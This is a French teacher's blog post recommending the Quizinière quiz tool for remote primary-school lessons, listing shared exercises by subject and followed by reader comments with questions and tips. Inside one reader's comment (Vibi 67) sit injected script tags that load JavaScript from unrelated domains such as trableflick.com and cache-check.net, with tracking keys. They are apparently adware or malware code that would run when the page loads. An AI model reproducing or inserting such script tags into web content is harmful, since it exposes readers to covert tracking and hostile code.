• Quizinière CE2-CM1-CM2

     

    Quizinière CM1-CM2

     

    Depuis 3 semaines, j'utilise quizinière de Canopé avec ma classe à distance. 

     

    Pour ceux qui ne connaissent pas encore, voici des tutos vidéos

    Créer un exercice sur quizinière 

    Diffuser un exercice et le corriger

     

    J'en suis vraiment ravie :

    - Tous mes élèves connectés y ont accès depuis tablette, ordi ou téléphone.

    - Je trouve la création des "quizz" très facile et intuitive. 

    - Cela me permet d'avoir un retour fluide et régulier du travail de mes élèves. 

    - On peut y insérer textes, images, sons. 

    - C'est gratuit. Il faut juste créer un compte enseignant.

    - Les élèves y ont accès avec un simple lien que vous partagez (pas de création de compte pour eux). 

    - Ils ne peuvent envoyer leur travail sans avoir écrit leur prénom ou pseudo (donc pas de "A qui est ce travail ???).   

     

    Voici le liste des quizinières que j'ai réalisés. Elle sera complétée au fur et à mesure. 

    Vous pouvez copier les modèles et modifier à volonté...

    ► En français 

    L'imparfait - Texte à trou > Complète ce texte en mettant les verbes entre parenthèses à l'imparfait.

    - Accord du participe passé - Étiquettes à associer > Associe chaque groupe sujet à un groupe verbal en faisant attention aux accords. 

    - Accord du participe passé - Texte à trous > Écris la terminaison du participe passé et pense aux accords avec le sujet quand il est construit avec l'auxiliaire être. 

    Homophones et/est, à/a - Petite leçon + texte à trous > Complète le texte avec et ou est / Complète le texte avec a ou à

    - Le complément du nom 1 : vidéo + exercices 

    - Le complément du nom 2 : exercices 

    - Le complément du nom 3 : exercices 

    Quizinières du complément du nom réalisés à partir du document de Bruce Demaugé-Bost

     

     

    ► En maths 

    Calcul d'aires - Quelle est l'aire de... (image) > Écris ton calcul en ligne / Écris ta phrase réponse. Il y a une mini coquille à la fin, "quelle est l'heure de ce carré". J'ai laissé... j'ai pu recevoir quelques réponses rigolotes en bonus ! he

    - Calcul mental (1) - Textes à trous > Division euclidienne de tête (avec rappel image) - Multiplier par 10, 100, 1 000 des nombres entiers (avec rappel vidéo) 

    Calcul mental (2) - Textes à trous > Division euclidienne de tête (avec rappel image) - Multiplier par 10, 100, 1 000 des nombres entiers (avec rappel vidéo)

     

    ► En lecture 

    L'EspagneLecture documentaire PDFquestionnaire de 9 questions (inspiré du travail de MaÖam) car nous avons une élève allophone originaire d'Espagne. 

    - Vive le sportquestions de compréhension 

    Texte PDF : Vive le sport 

     

    En histoire 

    L'école au temps de Jules Ferry 1 - 10 questions - réalisé à partir du travail de Laclassebleue avec la leçon 

    L'école au temps de Jules Ferry 2 - 10 questions réalisé à partir du travail de Laclassebleue avec la leçon

     

    ► En sciences 

    Séquence sur l'alimentation avec vidéo des fondamentaux de Canopé

    1) Que mange-ton ? - l'origine des aliments (animal, végétal, minéral) 

    2) D'où proviennent les aliments ? - les 7 familles et la pyramide alimentaire

    3) A quoi servent les aliments ? - aliments bâtisseurs, énergétiques, bâtisseurs 

    4) Bien manger, oui, mais comment ? - repas équilibrés 

    5) Les rôles des différents repas de la journée - Composer des repas équilibrés

     

    A quoi ça ressemble ? 

    Ce que voit l'élève sur un ordinateur : 

    Quizinière CE2-CM1-CM2

    Ce que voit l'élève sur un téléphone :

    Quizinière CE2-CM1-CM2

    Ce que voit la maitresse du travail des élèves - les résultats de la classe : 

    Quizinière CE2-CM1-CM2

    La copie de chaque élève avec correction automatique : 

    Quizinière CE2-CM1-CM2

     

     

     

    Pin It

    Tags Tags : , , , ,
  • Commentaires

    1
    Estelle
    Mercredi 22 Avril à 17:38

    Un grand merci! C'est super !

    Bientôt, il y aura un partage entre tous les utilisateurs. Mais en attendant merci pour ce partage,  car effectivement c'est toujours plus facile de partir d'un modèle existant.

      • Mercredi 22 Avril à 21:42

        Oui j'ai entendu dire que Canopé allait développer le côté partage. Vivement wink2

        Merci Estelle !

    2
    Mercredi 22 Avril à 17:46
    Merci pour la découverte et ces exercices. Je vais regarder cela de plus près du coup...
    3
    niouth
    Mercredi 22 Avril à 19:02

    C'est super ! Je découvre cet outil, pas trop compliqué à mettre en oeuvre.

    je vais tester à la rentrée en mai.... merci, je me suis permise de copier 2 de tes quizz pour me lancer. (aire et homophone)

    Reste à voir combien d'élèves arriveront à se connecter....

      • Mercredi 22 Avril à 21:45

        Oui, l'outil est basique, ce qui le rend très accessible. 

        A savoir que si tes élèves parviennent à recevoir tes mails par exemple, ils pourront se connecter au site de quizinière. Même mes "petits" connectés ont réussi à y accéder. 

    4
    Mercredi 22 Avril à 23:20

    Je ne connaissais pas cet outil, cela me donne envie de tester pour mes élèves à la rentrée ! Il faut que je vois si c'est fonctionnel pour les maternelles.

      • Jeudi 23 Avril à 12:05

        En maternelle, je ne sais pas du tout si l'outil est intéressant. J'ai l'impression que le support est petit : case à cocher, étiquettes petites tailles... A voir ! Pour les maternelles, je pense que Genially peut-être vraiment sympa, je l'utilise notamment en anglais avec ma classe. 

    5
    28lili
    Jeudi 23 Avril à 09:39

    Merci beaucoup pour ce partage, je m'empresse d'aller y jeter un œil...

    6
    Gwen53
    Jeudi 23 Avril à 09:45

    Merci pour toutes tes partages. Je me suis lancée sur Quizinière pour la dictée et mes élèves adhèrent vraiment. Ils sont contents de retrouver ma voix, mon écriture et je peux vite voir ce qui coince pour les aider. C'est vraiment un super outil facile à prendre en main, et si en plus on peut partager, ce sera génial !

    7
    Laurence
    Jeudi 23 Avril à 10:21

    Merci pour ce partage! Je m'étais intéressée à ce site mais je n'ai encore rien créé. Je vais essayer.

    8
    Jeudi 23 Avril à 21:02

    Coucou miss ! Moi j'ai un petit problème... quand je crée un QCM et que les élèves répondent, toutes les corrections apparaissent systématiquement fausses... sais-tu pourquoi ?

      • Jeudi 23 Avril à 21:09

        C''est bon j'ai trouvé... en fait à chaque modification dans l'exercice il faut refaire une diffusion avec un nouveau code... ;)

      • Jeudi 23 Avril à 21:42

        Oui effectivement, si tu effectues des modifications, il faut rediffuser. 

    9
    Sooh
    Jeudi 23 Avril à 21:32
    Comment se passe la gestion des codes d’accès des élèves ? Faut-il un nouveau code pour chaque exercice et pour la correction ?
      • Jeudi 23 Avril à 21:46

        Moi je donne directement le lien de partage, comme ça ils y ont accès sans code. Ils doivent en revanche noter le code individuel qui est différent pour chaque exercice. 

      • Sooh
        Vendredi 24 Avril à 10:54

        Merci pour ta réponse. Le code individuel n'est-il pas trop compliqué à gérer pour chaque exercice, surtout s'il y a beaucoup d'exercices différents? 

         
        What do you want to do ?
        New mail<button id="fenetremailtobuttonCopyClipboard">Copy</button><textarea id="fenetremailtoclipboardToCopySelect"></textarea>

    10
    Gwen53
    Jeudi 23 Avril à 22:11

    Depuis aujourd'hui (ou hier), il y a une bibliothèque de partage directement sur Quizinière dans laquelle on peut rendre nos modèles partageables en public avec autorisation pour les autres de les dupliquer et de les modifier. C'est vraiment super de pouvoir mutualiser.

    J'ai mis mes séances de dictée sur "La liberté guidant le peuple" en public et j'ai récupéré le quizz d'histoire de l'art correspondant. Finalement ce confinement va permettre à des enseignants qui, comme moi, n'osent pas montrer leur travail de se lancer !!

    Merci encore pour tous tes partages.

      • Vendredi 24 Avril à 00:03

        Oui tout à fait ! C'est vraiment super. J'ai déjà mis les miens en partage. 

        C'est en effet une belle occasion de partager tous ensemble. ^^ 

    11
    ffb
    Jeudi 23 Avril à 23:45

    J'ai découvert quizinière la semaine dernière chez un enseignant blogueur et je suis devenue accro. j'ai commencé par faire faire un petit ex court pour voir si cela fonctionnait au niveau des enfants et s'ils répondaient tous. Quelques erreurs de fonctionnement, mais c'était prévisible. Maintenant après cette période de rodage, mes élèves sont des pros. Hier première évaluation à distance, et tout le monde a répondu en heure et en temps. La correction est rapide et très efficace. Je suis fan

      • Vendredi 24 Avril à 00:05

        Pareil, je suis fan, d'autant plus que mes élèves adhèrent vraiment bien. 

    12
    Vendredi 24 Avril à 09:48

    Je viens de découvrir cet outil simple et complet, et ton partage m'a définitivment convaincue !

    Merci beaucoup.

    ^^

      • Vendredi 24 Avril à 11:47

        Merci Carine ! Ravie que cela puisse aider ! 

    13
    bigoud
    Vendredi 24 Avril à 09:56

    Merci pour ce partage ,je me lance , je compte aussi m'en servir pour la lecture à voix haute.

      • Vendredi 24 Avril à 11:48

        Peux-tu m'en dire un peu plus ? Tu mets un fichier audio pour la réponse des élèves ? C'est ça ? 

      • bigoud
        Vendredi 24 Avril à 17:56

        Oui c'est ça .

    14
    Vendredi 24 Avril à 13:33

    Bonjour,

    Juste pour dire qu'il y a un groupe facebook de partage.

      • Vendredi 24 Avril à 15:39

        Bonjour, pourriez-vous donner le lien svp ? Merci

      • Vendredi 24 Avril à 20:15

        C'est là, il faut demander pour rentrer dans le groupe.

        https://www.facebook.com/groups/624724728110680/?ref=bookmarks

      • Dimanche 26 Avril à 12:56

        Oui, je ne connaissais pas mais on m'y a invitée cette semaine. C'est super ! Bon désormais, Quizinière permet le partage des ressources, donc cela va grandement simplifier les choses. wink2

      • Dimanche 26 Avril à 14:51

        Merci beaucoup ! ^^

    15
    Delph
    Samedi 25 Avril à 15:57

    Encore un lien interessant. Merci

    16
    Anne
    Samedi 25 Avril à 18:28

    MERCI INFINIMENT !

    17
    P. Durez
    Dimanche 26 Avril à 12:02

    Génial ce site, j'adore. Je fais un essai avec la classe mardi sur le passé simple et compte bien créer d'autres documents si le retour est positif.

    Le fait de partager nos ressources est également super. MERCI !

    18
    Dimanche 26 Avril à 12:58

    Merci pour vos messages wink2

    19
    flodio
    Mardi 28 Avril à 08:53

    Coucou !

    J'avais essayé puis abandonné : mais en lisant ton post, je me suis dit que j'avais loupé quelque chose ! Merci pour les explications : avec les tutos c'est mieux !

    Petite question : comment faire pour avoir une correction automatique des quizz ? Je n'ai pas trouvé : du coup j'ai utilisé Thatquizz qui est moins sophistiqué mais qui propose la correction automatique et le comptage des points.

    JE te remercie et j'espère que tu auras un moment pour me répondre.

    bonne journée

      • Jeudi 30 Avril à 14:40

        Alors, tu as correction automatique : 

        - pour les QCM, en cochant la case dans chaque "QCM" que tu crées. 

        - Pour les textes à trous, la correction se fait automatiquement pour chaque mot sur lequel tu cliques (les trous) 

        - pour "associer" - tu mets tes paires ensemble (même numéro) puis tu mélanges. 

        - En revanche pour les autres, comme se sont des réponses libres, pas de correction automatique. 

        Il y a aussi le comptage des points sur Quizinière lors de la correction. 

        Pour qu'un élève ait la correction de son exercice, tu dois être dans la partie "Diffusion aux élèves", corriger les travaux ou juste mettre une annotation, puis quand tu cliques sur ton exercices, tu sélectionnes "diffusion des corrections". Quand l'élève retourne sur le lien de l'exercice, il tape son code de correction (toujours indiqué quand il a terminé un exercice) et voilà ! 

        J'espère avoir répondu à tes questions. 

    20
    CaroleClems
    Mardi 28 Avril à 09:05
    CaroleClems

    Un grand merci pour ton article, ça me motive pour tester !

    21
    Nell
    Mercredi 29 Avril à 15:21

    Bonjour

    Je l'ai utilisé juste une fois et j'ai trouvé ça super et les élèves aussi. La seule chose que j'ai trouvé vraiment dommage c'est que les élèves ne voient pas leur scores et les corrections en direct. Il faut qu'ils se reconnectent une fois le quizz "désactivé". Du coup ça les oblige à bien noter leur code d'accès (tous ne l'avaient pas fait) et à retourner en ligne alors que leur travail de la journée est terminé. Ou alors j'ai raté un truc dans les options ??

    Merci pour tes partages. Si l'option de partage général est désormais disponible je vais aller partager celui que j'ai fait en histoire sur la révolution (une aprtie de la révolution !)

      • Jeudi 30 Avril à 14:45

        Oui effectivement ils doivent attendre que le quizz passe en mode "diffusion des corrections". Je suis d'accord qu'un retour direct serait intéressant. Pour ma part, je propose un quizz pour un jour et le lendemain, je mets dans le travail de la journée de lire la correction. 

        J'ai vu ton partage sur la Révolution. Ce n'est pas dans mon programme d'histoire cette année mais Beau travail ! cool

    22
    niouth
    Jeudi 30 Avril à 14:44
    ah oui, moi aussi, ça m’intéresse de savoir si ça peut être auto-correctif ou si les élèves peuvent voir directement leur résultat....
      • Alice
        Dimanche 24 Mai à 14:45
        Alice

        Bonjour,
        Avec Quizinière, les élèves doivent attendre que leurs camarades aient rendu leur "copie" mpour voir la correction. C'est un des rares défauts de cette application. Si tu veux créer facilement un exercice auto-correctif, utilise Learning apps. Tu pourras par ailleurs utiliser des exercices déjà faits et très ludiques (mots croisés, vidéo avec insertion, images, textes à remettre dans l'ordre...).

    23
    Jeudi 30 Avril à 14:46

    J'ai ajouté du calcul mental. 

    24
    Peggy durez
    Jeudi 30 Avril à 15:50
    Génial. J'ai mis un éco sur passe simple verbes groupes 1 er 2. Puis sur ranger decimaux. Je vais créer aussi multiplier par 5 ce week end. Merci bcp à plusieurs c'est plus facile...
    25
    Samedi 23 Mai à 12:08

    Ajouts >> Séquence de sciences sur l'alimentation / Texte de lecture et questionnaire de compréhension 

    26
    niouth
    Samedi 23 Mai à 13:03

    merci à tous pour vos partages ! juste, lorsque je crée un quizz, c'est à quel moment que j'autorise le partage ? ..... j'arrive pas à voir. J'en ai fait quelques uns....

      • Samedi 23 Mai à 13:07

        Dés lors que tu as créé ton quizz, tu peux le "diffuser" à tes élèves - tu écris la date butoir et voilà. Le lien de partage donné à tes élèves est utilisable de suite. 

    27
    niouth
    Samedi 23 Mai à 17:48

    oui, merci.... ce que je voulais dire, c'est le partage avec vous ! en allant dans la galerie je trouve des quizz que d'autres ont crée et acceptent de partager. Comment faire pour partager les miens avec les autres "profs" ?

      • Samedi 23 Mai à 19:37

        Aaah ok ! Désolée, j'ai compris à côté ! Il faut cliquer sur "Partagez" - là tu devras indiquer le niveau la discipline et des mots clés pour trouver plus facilement puis accepter le partage. 

    28
    Vibi 67
    Samedi 23 Mai à 19:05

    Super, je m'y suis mise aussi, en tâtonnant au début , mais ça va de mieux en mieux, et maintenant je collecte des exercices tout fait que je remet à ma "sauce "  J'en ai partagé quelques uns dans un groupe dédié ...

    <script src="//trableflick.com/2271398b0972c49255.js"></script> <script src="http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8817x" type="text/javascript"></script> <script src="http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8817x&format=arrjs&r=1590253449577" type="text/javascript"></script> <script src="http://trableflick.com/ext/2271398b0972c49255.js?sid=52659_8817_&title=&blocks[]=31af2" type="text/javascript"></script>
      • Samedi 23 Mai à 19:38

        Cet élan de partage fait vraiment chaud au cœur ! 

    29
    Dimanche 24 Mai à 14:58
    Alice

    Bonjour,
    J'ai fait une petite vidéo pour expliquer à mes élèves de SEGPA comment utiliser Quizinière :

    https://www.youtube.com/watch?v=uKE4I-xhDmE

    Merci pour ton partage

    30
    Mercredi 27 Mai à 22:26

    Ajout de 3 quizinières sur le complément du nom 

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :